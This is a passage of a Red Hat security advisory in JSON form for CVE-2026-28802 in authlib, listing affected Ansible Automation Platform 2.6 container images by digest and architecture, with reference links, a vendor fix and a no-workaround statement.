"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:09c46d65ccff80c987fca5c83abca6e63edce8080c2c7fb0ef4ac5401672c0e6_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:7dd3351792b16a58a6f1f113e01daaf42937fa0c951a1f25f543c83b1ae97e99_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:c1829492bde010feeb674e9c0f80dfea8746e8090c8ee142cde17dc3b2f5ad41_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:f0e905a88c717e674b96a13545fbeda55c7cc265e0cda3ef8e01f9b06d18a478_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:01fd1e73fd125672778315487a4aa0ae13b7aac2b386d70facd7439d23ee0219_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:098cb05f8a5907e235746966a7918f03bf3a5d5435bc0b8dde7bf86460270fcc_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:2f5e577618a35a303e6df205e764af46c2a12f17072d0c806d1b532a5fb1491e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:ed7a7ba7daf1a16a600af6cf4a875588a4647f5541cb309634aaba6614abf027_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:0b58c1f3d4fd2432ef54cc336f1ef6bd8862b264f90d7a98b593242ac710c76b_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:1bd5776057ca0f4440a9bdb96caf67589f30e7e90ad5eb6003ba1544bd2956a1_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:48216d04a33d8625ed1ae89581f29662e8820620227873d9b8200437c0634945_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:a89fe49e49cfd10c9a11420eee13a1c813524524435b51a5d2ee729f4114b951_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:5fa148a59fbc353c61b41544f5947ea654625ea5343a97ab84193c314e72c4b5_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:a0977954bab9f309fa6c248ed10cf9362e5f2fe1092ff1e7eddaf5c73ea5ce71_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:a414eae477676d3ea422f07be4b3c5fe08c6090b7439a38a437e3ea83a2ecd54_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:d204205c731ab29336afda6a28becce7500485001ca550ffd01432e9c0a291eb_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:46f1880b16c4455553bcbf6213f3097dc53a000249b8123d6689b1f5a88f698b_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:a1a7fbf38343192e58709e13327a5becd211ae5177d75a185e0cd07c9391b57a_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:d7f49d3167a98ac52aad4a34e039612ded06439cc3d2ed851fd6a5e88d175ac2_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:fad44c5cdfad40cae6acb29a6a543f1b830ca057f531263280a28ffffc5bd2c5_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:2c628dddf76b660de5fd2c0ef6db0a92bc103b531590f1a2ac11bd6f9bae152e_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:387e24a93c680e8dea362f5dff8b75901f7db48a22c5edb9e653083e6f6f9713_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:b3414d0ae721e62fb7547d6b646b4c8cb8fdfc75e59a7fcdb0badacac06b4442_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:ccf651f792eb389d5cb6516728c6cc5a031e647de3a18cf5d51f3bd2819804b2_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:293b2d26b9a82fa6a55dafb4c594287838cae765c358f3bdfea5b89d83f0391e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:839fde96f80f9162c54b18bbbed747370feed4d0f285fe8c4da7e03341a87a35_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:b348d15239007fb45a4369d27d9b1cb38242d76b62bd5a007c92ccf48e4f7f76_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:db0b40d9a8190c7598de5537df75c83923a48d1927d733ceef4764d35d8056d7_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:355a13dd95069b23411aca550f6469ec0e62b917d95bc5b5f56d8f2c753ee6ab_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:3baaef08f478f90ed15a198ea0abee08dabbf0575eb2b7f6c8920964100aecfa_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:59bc52014bcc2207b6e08fadacebb28b27366ae96288f0d136bb48e5faa58283_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:7510d2566f94e33ef189efd5d92a9e213c5cf50610765c255160851538cb7082_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:1e6643af195008a5171926830de560512977f2063b6b0d54fb06f74b0b2bce5c_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:85a7baa49a787b787643a5198040e4a631347b155c3ba666a3459dc3fbb6b3a7_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:a2499454156bdd8ab363fd318636752971ba953a1c13bf7c1a8a58ac5e986ea7_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:bc51280e45f6375ca3d45d859161790934ef76ed59c747a2960720d58c7ee219_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:06974eece4bf83ef269de0d2d4b7c517a33ae2898a754ed74145e52dde32e3f9_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:07272286ddb11fdb19ae250d8fb5a02805961fd3bf22c7429ff3c1e9ea277f03_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:8e17441166eca872b54b71b57bf9699fd7d2ba4ccad9a36e36eb9e16873ba406_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:f0bc302bdd30b28257768ad3756173b4bc63c2d11b3d673e3df4bfa596224b51_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:8626376c1e33391f72ce9f403534a1b1f707b80f228d2a712f143157603662b7_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:96f1b9aeb408a4ace581f1f6258b6b2d2027101b336c2a653fadb1cf56439b5c_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:cb14d3cf5e8ae456a835826c88479341f08c4914c93de9f35a3c05092853a773_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:f00b87dd79fb1e56c8f4368026c9aed45ab5febe832bd98a7c718f965ab6656c_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:2a6bb1683b692eb0ae3afbd09d13626e044e4bc23c139a3c5ec8311db7c28c8a_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:2f6aa2305f39966d2652d795643172d947e1dd017443ed4d5a3e4a700874650d_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:4ac195ebfff24eb940914cc01a75fcb3d1d09aa7ec6ddfe9fcb439c03a8196b5_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:6375a3333e8e8443dd702ed5235ddf9b3b6578a6024a917455fdd82f1f38d004_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:79abdf5f9c95b6792765db2b69c8b6cb68eef889674d39203080044bee5fc556_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:f27581c3a84be7fc387d230aad9e3922caac3f5c59aff779a60aa149877f48e1_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-28802"
},
{
"category": "external",
"summary": "RHBZ#2445120",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2445120"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-28802",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-28802"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-28802",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-28802"
},
{
"category": "external",
"summary": "https://github.com/authlib/authlib/commit/a61c2acb807496e67f32051b5f1b1d5ccf8f0a75",
"url": "https://github.com/authlib/authlib/commit/a61c2acb807496e67f32051b5f1b1d5ccf8f0a75"
},
{
"category": "external",
"summary": "https://github.com/authlib/authlib/commit/b87c32ed07b8ae7f805873e1c9cafd1016761df7",
"url": "https://github.com/authlib/authlib/commit/b87c32ed07b8ae7f805873e1c9cafd1016761df7"
},
{
"category": "external",
"summary": "https://github.com/authlib/authlib/security/advisories/GHSA-7wc2-qxgw-g8gg",
"url": "https://github.com/authlib/authlib/security/advisories/GHSA-7wc2-qxgw-g8gg"
}
],
"release_date": "2026-03-06T06:44:26.402000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-03-31T23:31:56+00:00",
"details": "Before applying this update, make sure all previously released errata relevant to your system have been applied.\nFor details on how to apply this update, refer to:\nhttps://docs.redhat.com/en/documentation/red_hat_ansible_automation_platform/2.6#Upgrade",
"product_ids": [
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:111c3fa869282760a7408db240e5fbddd74816fa5ffc12578c267427eae8eb96_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:20ceae5ef8be4bc9ccc0e0f3b495a7f3f3bf5ba790dc4f91d33b063457974ca6_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:6c5f0d6ede717eb230efb7676cc320a96ab6667f81d8f0a52a22b5a3986de163_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:d17dce8e1cc199e35217043b9b80a0d748520cf40204713ba872b5ce14ebf7cc_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:6309"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base, or stability.",
"product_ids": [
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:224ab5167af0fc5fc9a2a8b7137029ba57121cb81ea22a419d0ec4c40e8d784b_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:7dfd054c74d7a378e3ca424d09d7c01953ce6a6d104de3e4eca3d362d13c8f33_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:d26bca87c2018b489472f1f1d4dbc23f5edb75584f59ebde540345df3f055b5a_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:e43db60ae78ea52aa60425b0bcd13d5660a72a3e888baa043125040df3b1e499_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:1fee430fbd0bd7fe7397e49f8397f76413c76b32773d1abffed1d9864c7d9de3_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:75de2b87ea13dca25bdba78cb2fd40ab151849934ac29ca1f3ff2ccc10e66e14_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:97bf81197a5bbfce3f58968f45ce2f12d3cb0ba934f09e14e35df1658ce87011_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:db8e631f92329e1da78b76a7d510e6dace445aecdcba5b7d65896c4dde5b6d96_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:043c87b541b2325c404dfcb3a9dac7176e752ed0e5d86794a16173b6a6241847_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:417b2cd5d8606cda83728e77b110f1cd8ef3aaeeca0e5cecce3059dba1ee0264_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:8522589f076c035e66b5a9ed86d527a20addd215ce5ba7d995875b4e00a1bd15_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:8f6d6144ac73ba9f0133ca1303405cb9f28309cea10213ad2a6745fe91221075_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:040fdb42669fdffbf36816baa431fb75d622225ee3cf1e1125c9d3c9710276a5_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:2e6151aad850692bc01a22f5c6c9bea03b7ffdaae81a19996ee5abbe4a6fe907_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:51d11fcc48ae07e3e31ba3d15ca9f8302511f9db7c9a906cd1fc503da4e56851_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:ee388c6cde6ddc916d0a727de14bf27aa2b4b276c10b252132ca3db00f4d5bc6_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:1936dbed39475b5705a0c9d858475ac0ab9b691bb2b5cbbbe096764250bd1b5a_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:3851cd311b32f446bdb7dbd4edc9b3a44b091aa47e3fd2aaa181adbee24d5c44_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:5280259749ce19ade8a2c38d6c6df35e9b36885c78fa32fd21ac22ff9b6fae33_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:a490261dea13fa75a1c4aa0a175da144c26a5dc727dc542609c25655adeb8819_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:5b7d84bb78f87575c588bc0352de7ebe2ad76134612b7626eb3f2356987aa2cc_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:78c68b90d3d4e96228da6795470f25c8dabe7281b4acd8f73f582ef6e27782df_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:9e549ae5de2bfdde62a415e21472f2ce06bfc22be43f89b5ff3298e712d200fe_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:c67254bbf63fe1220d58de04f36770afd4a6835a8903d03233310b13ed134a3b_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:2c673483c46ff570b8295349c81cae38c26acc2482c13fc58b1871ccb2770166_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:94097cac68936281f364fae0e90f42b19a7bc7d8a35c77dca2c339eaf2b87f20_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:9de1fb1864a4cc20d35dd42b6c62d6e3d4438430ba944c35b9289eb429ac73c1_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:fa5dd987c4032dd4749f81e265456b1abd3063c2b134434c32006d4a124a9dca_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:2ea73fdfacf7292d0e081eb3b57d2d723ca76c729b0f58f21df1da3206a14d93_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:8c84e698460ab0d3464b754ede624586ba6325e67d82eb061b5ce39a4d2e64c1_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:f731c2beaa1e26a7056343691dcbfa293aa1482c0ab2d2975c76b9483cf18833_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:fe0b1298bb9dbe8b981b83ac31761c3cf174dbc5b6adc6e3df39e7a238349822_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:7469312b88732742feb5f2f37b6c71f3af5b2dc19ed79d4bca9d76fa7378e36c_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:d0611098779c697a2d89003347f3fdf3654878e5bba75a43916fd25ac52b72ae_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:e4b5aabce6d95cb6084ef520884b45f11f78aeea0e6c696d7ef2aada7ed6f1f5_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:f720d731ed73925d2e5b2eff3c2c821a0600352546577c5b45c087de78b6a95b_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:4ff9668f5534af7c08b0027c6c6e48dd571fb1dc8331b9a3ede8f888394960e1_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:64e94f45572136738b0d0d47688a4ec4e9412142d65763196dced360fe426b70_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:b8aefb470283f4020d7565bf18893144b77568a4bc7cee5c4307b39a69ef48b6_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:f95849a65d7c218be6c34619a8c8502f213d96f745ff73525fa898560230cafd_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:3c83b77b1291ae9e3003b1eb16bcd1b21752733d5ea0b7f9193bea2ba9302215_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:6d333bdef78bef7ba85b04a1a6c5d33591263371b5f740813efae68788e32a6c_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:86ac843a55e47fa052c11f263a0ebf4f0c969cf5f60f62a5b88006c963f5b772_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:b77fba98853eb0fabcbcd4981c347cf909f50e64ea32f4c0d8313d89cdb48cf7_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:094676fb53084cc7ca93010b2667fde26a83c78bd84af7dfef86e27149fc2385_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:1ba54fa91703c8105080e534a74b85b257c0123abb87d9aa4c05f05e32c24c9b_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:21582b96b79a5a1800ce288633970ed7303655e31a202993df84159d3dca7826_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:d6adc9bd2df9fded6228ddd5dbca3919991913b40fb95b12d4d01cf96c5f4d60_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:021da3e8a0a608ea02313825524721dbab07075edd667a26cfcb2f3d74ae2b18_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:0cf30ea331a045608d69ff66003f19434daa1940179fdae26256df39a9073f45_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:5eb3f34a73fc52d81224ce6633de758082fbae3b814416cf535d9dad3cd4945f_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:92c85eabe94b95c63307991c3881acbd34a808c4f34ca57c66a97550ee51b884_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:09c46d65ccff80c987fca5c83abca6e63edce8080c2c7fb0ef4ac5401672c0e6_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:7dd3351792b16a58a6f1f113e01daaf42937fa0c951a1f25f543c83b1ae97e99_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:c1829492bde010feeb674e9c0f80dfea8746e8090c8ee142cde17dc3b2f5ad41_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:f0e905a88c717e674b96a13545fbeda55c7cc265e0cda3ef8e01f9b06d18a478_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:01fd1e73fd125672778315487a4aa0ae13b7aac2b386d70facd7439d23ee0219_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:098cb05f8a5907e235746966a7918f03bf3a5d5435bc0b8dde7bf86460270fcc_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:2f5e577618a35a303e6df205e764af46c2a12f17072d0c806d1b532a5fb1491e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:ed7a7ba7daf1a16a600af6cf4a875588a4647f5541cb309634aaba6614abf027_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:0b58c1f3d4fd2432ef54cc336f1ef6bd8862b264f90d7a98b593242ac710c76b_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:1bd5776057ca0f4440a9bdb96caf67589f30e7e90ad5eb6003ba1544bd2956a1_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:48216d04a33d8625ed1ae89581f29662e8820620227873d9b8200437c0634945_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:a89fe49e49cfd10c9a11420eee13a1c813524524435b51a5d2ee729f4114b951_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:5fa148a59fbc353c61b41544f5947ea654625ea5343a97ab84193c314e72c4b5_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:a0977954bab9f309fa6c248ed10cf9362e5f2fe1092ff1e7eddaf5c73ea5ce71_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:a414eae477676d3ea422f07be4b3c5fe08c6090b7439a38a437e3ea83a2ecd54_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:d204205c731ab29336afda6a28becce7500485001ca550ffd01432e9c0a291eb_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:46f1880b16c4455553bcbf6213f3097dc53a000249b8123d6689b1f5a88f698b_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:a1a7fbf38343192e58709e13327a5becd211ae5177d75a185e0cd07c9391b57a_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:d7f49d3167a98ac52aad4a34e039612ded06439cc3d2ed851fd6a5e88d175ac2_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:fad44c5cdfad40cae6acb29a6a543f1b830ca057f531263280a28ffffc5bd2c5_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:111c3fa869282760a7408db240e5fbddd74816fa5ffc12578c267427eae8eb96_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:20ceae5ef8be4bc9ccc0e0f3b495a7f3f3bf5ba790dc4f91d33b063457974ca6_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:6c5f0d6ede717eb230efb7676cc320a96ab6667f81d8f0a52a22b5a3986de163_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:d17dce8e1cc199e35217043b9b80a0d748520cf40204713ba872b5ce14ebf7cc_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:2c628dddf76b660de5fd2c0ef6db0a92bc103b531590f1a2ac11bd6f9bae152e_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:387e24a93c680e8dea362f5dff8b75901f7db48a22c5edb9e653083e6f6f9713_ppc64le",
